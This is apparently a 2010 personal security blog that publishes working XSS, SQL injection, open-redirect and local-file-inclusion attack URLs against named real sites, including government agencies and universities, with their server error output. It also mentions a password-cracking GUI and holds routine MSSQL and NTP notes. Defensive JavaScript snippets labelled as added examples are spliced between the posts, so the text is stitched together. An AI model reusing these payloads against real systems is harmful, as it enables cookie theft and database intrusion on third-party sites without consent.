Thursday, 27 May 2010

MSSql or MSSqhell?

I've spent a lot of time (crappily) coding some converters from MySQL to Access (and vice versa), while on the internet we already have such tools, and those DBMSs already have some basic features to export whole databases in a human-readable and easy-to-use format.
I've found that the biggest problem is the lack of decent tools to export MSSql.
Since I'm quite busy, I hoped to find an easy solution (tool) to export all the databases of an MSSql Express server to a simple SQL text file.
I know that I can use "osql" to do a backup, but I needed a damn SQL text file with the structure and the data, just to modify several things by hand, to understand the different kinds of queries, and then to restore the database in an error-free manner.

After a whole day I've found only a single decent tool that has worked efficiently, and it's
EMS MS SQL Manager Lite
The lite version is free and it's good for a basic administration of an express version of MSSql.

If you have a full version of MSSql (€€€ $$$) you can export the database(s) in several formats by using the administration tools. The problem is that you need to own a software

----
Other generic free tools for the administration of MSSql (express)

DbaMgr

DbaMgr2k
http://www.asql.biz/en/Download.aspx#DbaMgr

osql batch database extractor (doesn't work as expected)
http://www.rs-freeware.org/osql/#install

Java client (I don't have Java installed on the server and I did not have the time to upload the JRE, so I don't know if it's a good tool or not).
http://squirrel-sql.sourceforge.net/
-------


Suggestions about other tools are welcome.

net time on windows??? I've never used it before ...

I've recently found out that there are some commands that have been available since Windows 2000 (afaik), but some references point to availability since Windows 95 (http://www.computerhope.com/nethlp.htm).
I've never used them, but they are quite useful sometimes when you need to sync several computers in batch, especially within an Active Directory.


UDP port 123 (SNTP) - TCP port 37 (TIME)

I've added the nearest server.
net time /setsntp:"ntp.prato.linux.it"
(we can add other servers separated by a space)


On Linux I've always used this command
sntp -a ntp.prato.linux.it
to adjust the time from a server

and/or editing
/etc/ntp.conf
with the simple string
server ntp.prato.linux.it

Lists of the servers are available on ntp.org
I'm unable to use the ntp pools, they just timeout (?).

https://support.ntp.org/bin/view/Servers/StratumOneTimeServers
https://support.ntp.org/bin/view/Servers/StratumTwoTimeServers
https://support.ntp.org/bin/view/Servers/NTPPoolServers
http://tf.nist.gov/tf-cgi/servers.cgi


I know that this post is useless but I publish it for myself to remember something that I forget each time.


Suggestions and more information are welcome.

Wednesday, 26 May 2010

mirror of the old website of packetstuff.com

I've found the mirror of the old website of packetstuff.com
with all the tools using the PSSDK (WinPCap to PSSDK migration module).
Some links are dead and there are too many banners but generally it should work.

http://packetstuff.interfree.it/

Friday, 21 May 2010

http://www.mfa.gov.ir | XSS

Simple XSS

http://www.mfa.gov.ir/cms/cms/simple_search.jsp
(in the form)
<script>alert(document.cookie);</script>

Thursday, 20 May 2010

rockol.it XSS

rockol.it XSS

the xss starts with a mouse over the link
http://www.rockol.it/search.php?s=Alessandra%20Amoroso%202010%3Cdollo'%20onmouseover='alert(1);'%20title='

Wednesday, 19 May 2010

Various tools that I've archived a long time ago

A collection of various free tools and books that I've archived a long time ago.

I've made several changes and I cannot keep this collection updated each time.
http://websec.interfree.it 

Monday, 17 May 2010

gay.tv | XSS

gay.tv xss

XSS (simple)
-
(old and ... *fixed*)
http://www.gay.tv/aggregato.jsp?string=<script>alert(1);</script>&x=0&y=0

(new XSS)
----
http://www.gay.tv/search/?123%3Cscript%3Ealert%281%29;%3C/script%3E

Thursday, 13 May 2010

http://www.murrayky.gov | Sql injection

Sql Injection (id)
http://www.murrayky.gov/showevent.htm?ID='

-error-
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
---


http://www.murrayky.gov/showevent.htm?ID=123+union+select+1,2,3,4,5,table_name,7,8,9,10,11,12,13,14,15,16%20from%20information_schema.tables--

http://www.mssti.com/

abbcode.php problem

/home/mssti/public_html/phpbb3/

Wednesday, 12 May 2010

A list of useful crowdsourcing websites

 
-----------------
Reference/Source for the websites
("CrunchBase is the free database of technology companies, people, and investors")
-
 
----
The CrowdSpirit platform proposes a new model based on crowdsourcing that enables businesses to involve innovators from outside the company directly in the design of innovative products and services
----
crowdsourcing - movies
----

http://tweetmeme.com | XSS

While subscribing to utest.com I've found this simple XSS on tweetmeme.com (a service that they use to tweet ... I suppose).
funny .... ?

XSS ( no checks/sanitizing ... nothing)
http://tweetmeme.com/popup/option?url_id=984607153&source=utest&service=bit.ly.%22>%3Cvideo src=1 onerror=alert(document.cookie) >

http://tweetmeme.com/popup/option?url_id=984607153&source=utest%22%3E%3Cvideo%20src=1%20onerror=alert(document.cookie)%20%3E&service=bit.ly

http://tweetmeme.com/popup/option?url_id=984607153%22%3E%3Cvideo%20src=1%20onerror=alert(document.cookie)%20%3E&source=utest&service=bit.ly

redirecting anywhere
http://ads.tweetmeme.com/redirect?width=300&height=100&tag=home&advertid=135&nurl=http://www.google.com

spammy
http://blog.tweetmeme.com/?s=.&feed=Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nunc sit amet elit turpis. Cras elementum, turpis quis rutrum viverra, dui sapien auctor lorem, sed suscipit dui odio eget ligula. Nunc a sem mauris, a porta tortor. Nunc in varius justo. Praesent venenatis ultrices condimentum. Morbi eget imperdiet ante. Praesent eros metus, pulvinar nec laoreet a, aliquam nec orci. Nunc cursus condimentum lacus, at dictum sapien tincidunt non. Nullam gravida condimentum leo, id porta nibh placerat sit amet. Phasellus sed elit vel quam ornare laoreet.
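
How a redirector like the "redirecting anywhere" one above can validate its nurl parameter before sending the user on. This is an added example, not code from tweetmeme or from the original post; the allow-list, the fallback URL and the function name safeRedirectTarget are assumptions.

```javascript
// Assumption: the only hosts this redirector should ever send users to.
const ALLOWED_HOSTS = new Set(['tweetmeme.com', 'blog.tweetmeme.com']);
const FALLBACK = 'http://tweetmeme.com/';

// Returns the URL to redirect to: the validated target, or FALLBACK.
function safeRedirectTarget(nurl) {
  if (typeof nurl !== 'string' || nurl.length === 0) return FALLBACK;
  // Backslashes and control characters are normalised differently by
  // browsers and servers, so refuse them outright.
  if (/[\\\x00-\x1f\x7f]/.test(nurl)) return FALLBACK;
  let target;
  try {
    // Absolute URLs only: "//host/path" and "/path" throw without a base.
    target = new URL(nurl);
  } catch {
    return FALLBACK;
  }
  if (target.protocol !== 'http:' && target.protocol !== 'https:') return FALLBACK;
  // "http://tweetmeme.com@other.example/" parses with other.example as host,
  // so any userinfo part is rejected.
  if (target.username !== '' || target.password !== '') return FALLBACK;
  // Exact host match; a suffix test would accept "tweetmeme.com.example.org".
  if (!ALLOWED_HOSTS.has(target.hostname)) return FALLBACK;
  return target.href;
}

// Constructed inputs; the first is the target used in the post.
const SAMPLES = [
  'http://www.google.com',
  '//www.google.com',
  'http://tweetmeme.com@www.google.com/',
  'http://tweetmeme.com.example.org/',
  'javascript:alert(1)',
  'http://blog.tweetmeme.com/?s=x',
];

// Pairs each sample with the decision taken for it.
function decisions() {
  return SAMPLES.map((s) => [s, safeRedirectTarget(s)]);
}
```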

Monday, 10 May 2010

www.interno.it | XSS

Various characters are replaced, but the XSS is still possible and we can redirect the user where we want to.
The xss is triggered by the onmouseover on the available images.

In this case we send the user to google.

XSS

http://www.interno.it/mininterno/site/it/sezioni/sala_stampa/gallery/2010/0934_maroni_in_visita_al_cairo/index.html?month=5%22%20onmouseover=%22location.href='http://www.google.com';


same problem in other pages of the website
http://www.interno.it/mininterno/site/it/sezioni/sala_stampa/gallery/2010/0934_maroni_in_visita_al_cairo/9.html?month=5%22%20onmouseover=%22location.href=%27http://www.google.com%27


Note: we can also change the stylesheet and do other things. This is just a sample.
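
Why replacing a few characters does not close this kind of hole, and what does. This is an added example, not code from the site or from the original post; the filter in weakFilter, the link markup and the function names are assumptions about the kind of replacement described above.

```javascript
// Constructed input: the decoded `month` value from the first URL in the post.
const SAMPLE_MONTH = `5" onmouseover="location.href='http://www.google.com';`;

// Assumed weak filter: drops angle brackets and the word "script" only.
function weakFilter(value) {
  return value.replace(/[<>]/g, '').replace(/script/gi, '');
}

// Vulnerable rendering: the filtered value is pasted into a quoted attribute,
// where a double quote is enough to start a new attribute.
function weakHref(month) {
  return `<a href="index.html?month=${weakFilter(month)}"><img src="1.jpg"></a>`;
}

// Encode every character that can end or restructure an attribute value.
function encodeAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Hardened rendering: validate the type first, then encode for the context.
function safeHref(month) {
  const n = Number.parseInt(month, 10);
  // `month` is only ever 1..12; anything else falls back to a default.
  const valid = /^\d{1,2}$/.test(String(month)) && n >= 1 && n <= 12;
  const value = valid ? String(n) : '1';
  return `<a href="index.html?month=${encodeAttr(value)}"><img src="1.jpg"></a>`;
}

// Small attribute scanner: returns the attribute names of the first tag,
// which shows whether the input managed to add one.
function attrNames(html) {
  const tag = html.slice(1, html.indexOf('>'));
  const names = [];
  const re = /\s([a-zA-Z-]+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)/g;
  let m;
  while ((m = re.exec(tag)) !== null) names.push(m[1].toLowerCase());
  return names;
}
```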

New Version of mdcrackgui

"A simple GUI for the mdcrack application. -MDCrack is a free featureful password cracker designed to bruteforce 21 algorithms: MD2, MD4, MD5, HMAC-MD4, HMAC-MD5, FreeBSD, Apache, NTLMv1, IOS and PIX (both enable and user) hashes"

List of the supported algorithms
MD2, MD4, MD5, MD5MD5, MD4MD4, MD4MD4S, MD5MD5S, HMAC-MD4, HMAC-MD5,IPB2, PHP, PHPS, FREEBSD, NTLM1, PIX, PIX-U, IOS, APACHE, CRC32, CRC32-B, ADLER32

The output/error redirection of the console to a textbox is still not fully working. You can still use the console (as default).

https://sourceforge.net/project/mdcrackgui

New version of Firefox Portable WebTools

New version of Firefox Portable WebTools

"a Portable version of Mozilla Firefox with several add-ons that are useful for Web Application Security. The purpose of this package is to have the best available addons to manually test XSS, SQL, siXSS, CSRF, Trace XSS, RFI, LFI, etc"


The changes
Added Theme Sky+
Added Groundspeed Addon
No-Script Updated
.net addon updated
Added a long list of (my) bookmarks. Initial sorting and organization.
Added a batch file to clean a bit of useless data


https://sourceforge.net/projects/firefoxwebtools


In the next version
Added FireGPG (still under testing not yet portable)
Cleaning for FireGPG (to check if we want to remove the keys )
Firebug Updated
Access Me Updated
SQL Inject Me Updated
XSS Me Updated
Wappalyzer Updated

Probably I will add an intermediate release with only the regular updates of the addons.

Sunday, 9 May 2010

casapounditalia.org | SQL Injection in joomla

 Sample POST (joomla bug - google for it)
http://www.casapounditalia.org:80/index.php?option=com_content&view=%2527&id=35&Itemid=60
id=35&sectionid=6&task=category&filter_order=a%2Edates

----

Warning: Invalid argument supplied for foreach() in /home/casapoundi/domains/casapounditalia.org/public_html/components/com_content/models/category.php on line 337

Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/casapoundi/domains/casapounditalia.org/public_html/libraries/joomla/database/database/mysql.php on line 344

Chi Siamo

Friday, 7 May 2010

kisskiss.it | XSS

XSS (nick)
http://www.kisskiss.it/Eventi?s=1&nick=nickname<script>alert(1);</script>&profilo=4558b8be-57ba-11df-8fc9-9dcf6b19122e

 -
http://www.kisskiss.it/OnAir?radio=%3Cscript%3Ealert(document.cookie);%3C/script%3Esroldasrock

Wednesday, 5 May 2010

A list of chat, live chat scripts

A list of chat, live chat scripts.

https://sourceforge.net/projects/webberchat/
https://sourceforge.net/projects/icsc/
https://sourceforge.net/projects/ajax-chat/
https://sourceforge.net/projects/cconnect/
https://sourceforge.net/projects/phpchatter/
http://www.craftysyntax.com/
http://code.google.com/p/php-lively/
http://mibew.org/
http://www.reallinkchat.com/
http://www.helpcenterlive.com/
http://www.chattist.com/

Under testing

Tuesday, 4 May 2010

vark.com | XSS

Vark.com has recently been acquired by Google.

This XSS seems to be useless (theoretically harmless).



just add for a new topic

<img src=1 onerror=alert(document.cookie)>


-------------

For the second XSS




do the same
<img src=1 onerror=alert(document.cookie)>
adding a topic to one of your friends

---------------------------------
For the third XSS add the XSS payload

<img src=1 onerror=alert(document.cookie)>
in the activities of your profile, and when vark.com loads them (after registration, in the share area)
you will see it working.
This will work only one time.

-----------

All those XSSs are useless in theory.

metranslate

I've added on sourceforge a very old vb.net application.
It's really crappy and outdated but it should work and can still be used for the latest language files of Mailenable.


https://sourceforge.net/projects/metranslate/
A standalone application that helps in translating the language files of the MailEnable application (Mail Server for Microsoft Windows).
MailEnable website http://www.mailenable.com/
This is an alternative to the MELangTranslator.exe for MailEnable.

Facebook Application ..... partial XSS ...

Facebook Application XSS
(basically you can also load any image to the user, e.g. the Google logo)

http://apps.facebook.com/funny_pho_to_widget/?shared=



I'm not able to inject other js functions (that are encoded or removed) ... so I'm a bit stuck with the fact that I cannot use the cookies.
I will add more information if I can do something different from a stupid and useless alert.

FirefoxPortableWebTools 0.0.0.4

A new version of Firefox Web Tools is available for download
https://sourceforge.net/projects/firefoxwebtools/

"A Portable version of Mozilla Firefox with several add-ons that are useful for Web Application Security. The purpose of this package is to have the best available addons to manually test XSS, SQL, siXSS, CSRF, Trace XSS, RFI, LFI, etc"


-Changelog-

FirefoxPortableWebTools-0.0.0.4
Added Theme Sky+
Added Groundspeed Addon
No-Script Updated
.net addon updated
Added a long list of (my) bookmarks. Initial sorting and organization.
Added a batch file to clean a bit of useless data

Read the respective licenses of mozilla firefox and all the addons!


Maybe I'm the only person that is using it :)
Anyway .... it's free.

Monday, 3 May 2010

http://search.mit.edu/ - http://sap.mit.edu | XSS

simple XSS in the search form
http://sap.mit.edu/information/search/

"><script>alert(document.cookie);</script><"
---

xss
-
http://search.mit.edu/search?q=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22&btnG=Go&site=mit&client=mit&proxystylesheet=http%3A%2F%2Fweb.mit.edu%2Fcre%2Fc%2Fgoogle-crestyles-v4.xsl&output=xml_no_dtd&as_dt=i&as_sitesearch=http%3A%2F%2Fweb.mit.edu%2Fcre&proxyreload=1

www.slac.stanford.edu | XSS

http://www.slac.stanford.edu/spires/find/jobs/wwwbrief?FIELD=&REGION=&RANK=&cc=&SEQUENCE=da%28d%29&abs=%22%3E%3Cvideo+src%3D1+onerror%3Dalert%28document.cookie%29%3E

comune.trento.it | SQL Injection

SQL Injection jsp->DB2.

(this works after a few post requests)
http://webapps.comune.trento.it/statistiche_elettorali/StatisticheLista.do?arkRifMan=1272909259708,1272909305354&pager.order_by=WKVOVA0'8

javax.servlet.jsp.JspException: ServletException in '/framework/statistiche_lista.jsp': Errore DB :Errore SQL file : ETWKXXF1 [SQL0010] Inizio costante stringa '8, WKVOV' non delimitato.
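
The injectable value here is a sort column, which cannot be bound as a query parameter, so the fix is an allow-list for the column plus bound values for the ids. This is an added example, not the application's code: the table name is taken from the error text above, while the RIFMAN and WKLISTA column names and the function name are hypothetical.

```javascript
// Assumptions: table name from the error text in the post; RIFMAN and
// WKLISTA are hypothetical column names, WKVOVA0 is the one in the URL.
const TABLE = 'ETWKXXF1';
const SORT_COLUMNS = new Set(['WKVOVA0', 'WKLISTA']);
const DEFAULT_SORT = 'WKVOVA0';
const MAX_IDS = 20;

// Builds the statement text and the values to bind from request parameters.
function buildStatsQuery(query) {
  // Identifiers cannot be bound as parameters, so map the request value
  // onto a fixed set of column names instead of quoting or escaping it.
  const requested = String(query['pager.order_by'] ?? '');
  const column = SORT_COLUMNS.has(requested) ? requested : DEFAULT_SORT;

  // arkRifMan is a comma-separated list of numeric ids: validate each one
  // and bind it as a value, one placeholder per id.
  const ids = String(query.arkRifMan ?? '').split(',').map((s) => s.trim());
  if (ids.length > MAX_IDS || !ids.every((s) => /^\d{1,15}$/.test(s))) {
    throw new RangeError(`arkRifMan must be 1-${MAX_IDS} numeric ids`);
  }
  const marks = ids.map(() => '?').join(', ');

  return {
    text: `SELECT * FROM ${TABLE} WHERE RIFMAN IN (${marks}) ORDER BY ${column}`,
    values: ids.map(Number),
  };
}

// Constructed request: the parameters from the URL in the post.
const SAMPLE_REQUEST = {
  arkRifMan: '1272909259708,1272909305354',
  'pager.order_by': "WKVOVA0'8",
};
```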

www.israelnationalnews.com | XSS

XSS
http://www.israelnationalnews.com/Subscribe/?email=dasewqr%40dasa.com%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E&subscribe_submit=Join

www.sviluppoeconomico.gov.it | XSS - Blind SQL Injection - LFI - System Compromise

http://www.sviluppoeconomico.gov.it/primopiano/dettaglio_primopiano.php?sezione=primopiano&tema_dir=../index.php&id_primopiano=87
Warning: require(../../index.php\0\0/navigazione/right_menu.php) [function.require]: failed to open stream: No such file or directory in /var/www/sitomap/primopiano/dettaglio_primopiano.php on line 25


sample sql inj.
http://www.sviluppoeconomico.gov.it/organigramma/elenco_dossier.php?sezione=organigramma&tema_dir=tema2&gruppo=5%20group%20by%201

-
Fatal error: Call to a member function Fields() on a non-object in /var/www/sitomap/class/lista_dossier.php on line 45
-
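
Where the tema_dir value ends up on disk, and a check that keeps it inside the site. This is an added example, not the site's code: the directories come from the warning above, the include pattern is inferred from that warning, and the theme list and function names are assumptions.

```javascript
// Paths taken from the warning in the post; the theme list is an assumption
// ("tema2" appears in the post, "tema1" is hypothetical).
const SCRIPT_DIR = '/var/www/sitomap/primopiano';
const SITE_ROOT = '/var/www/sitomap';
const KNOWN_THEMES = new Set(['tema1', 'tema2']);
const SUFFIX = 'navigazione/right_menu.php';

// Resolve "." and ".." segments of `rel` against the absolute directory `base`.
function resolveFrom(base, rel) {
  const out = base.split('/').filter(Boolean);
  for (const seg of rel.split('/')) {
    if (seg === '' || seg === '.') continue;
    if (seg === '..') out.pop();
    else out.push(seg);
  }
  return '/' + out.join('/');
}

// Pattern implied by the warning: "../" + tema_dir + a fixed suffix,
// resolved relative to the directory of the running script.
function weakIncludePath(temaDir) {
  return resolveFrom(SCRIPT_DIR, `../${temaDir}/${SUFFIX}`);
}

// Hardened version: the parameter selects one of the known theme names and
// never contributes path syntax of its own.
function safeIncludePath(temaDir) {
  // The warning in the post shows NUL bytes inside the path: reject them.
  if (typeof temaDir !== 'string' || temaDir.includes('\0')) {
    throw new Error('bad tema_dir');
  }
  if (!KNOWN_THEMES.has(temaDir)) throw new Error('unknown theme');
  const full = resolveFrom(SITE_ROOT, `${temaDir}/${SUFFIX}`);
  // Second check, in case the allow-list is ever loosened.
  if (!full.startsWith(`${SITE_ROOT}/${temaDir}/`)) {
    throw new Error('path escapes theme dir');
  }
  return full;
}
```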

http://www.vigilfuoco.it | XSS - SQL Injection

Full of xss and sql injections. Access to 2 dbms. Possible system compromise.  (main language asp)

----------------------------------------------OLD deadlinks/fixed -------------------------------
XSS
http://www.vigilfuoco.it/emailCert/default.asp (form)
"><script>alert(document.cookie);</script><"



http://prevenzioneonline.vigilfuoco.it/VVF/HttpAdapter?CMD=loginDebole&forward=consultazioneMultiplaHandler&codFun=2&action_btn=loginInSessione&nomeServizio=Consultazione%3Cscript%3Ealert(document.cookie);%3C/script%3E


SQL Injections

The first with an oracle error
http://www.vigilfuoco.it/informazioni/norme_attivita_istituzionali/indice_cronologico.asp?menu=52'

-------------------------------------------------------
OraOLEDB error '80004005'

ORA-01756: stringa tra virgolette terminata in modo irregolare

/includes/menu.asp, line 44
--------------------------------------------------------





This one is related to
http://www.vigilfuoco.it/informazioni/norme_attivita_istituzionali/indice_cronologico.asp?cboPeriodo=%3Casso4&btnNome1=Vai

-------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC Microsoft Access Driver] Syntax error (missing operator) in query expression 'id_periodo = <asso4'.

/informazioni/norme_attivita_istituzionali/indice_cronologico.asp, line 72
-------

http://www.vigilfuoco.it/notiziario/archivio.asp (form)
---------
OraOLEDB error '80004005'

ORA-01756: stringa tra virgolette terminata in modo irregolare

/notiziario/archivio.asp, line 378
--------




http://www.vigilfuoco.it/informazioni/uffici_territorio/direzioni.asp?reg=7
----------------------------
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Virgoletta di chiusura mancante prima della stringa di caratteri ''.

/informazioni/uffici_territorio/direzioni.asp, line 225
----------------------------
-------------------------------------------------------------------------------------------------------

--------------------------NEW---------------------------------------------
Oracle DB Sql Injection

http://www.vigilfuoco.it/informazioni/uffici_territorio/GestioneSiti/homepageTemplate.asp?s=361{SQL INJECTION HERE}&p=1041

http://www.vigilfuoco.it/sitiVVF/vercelli/notizia.aspx?codnews=12908&s=361{SQL INJECTION HERE}

http://www.vigilfuoco.it/sitiVVF/vercelli/uffici.aspx?s=361{SQL INJECTION HERE}&p=1044{SQL INJECTION HERE}

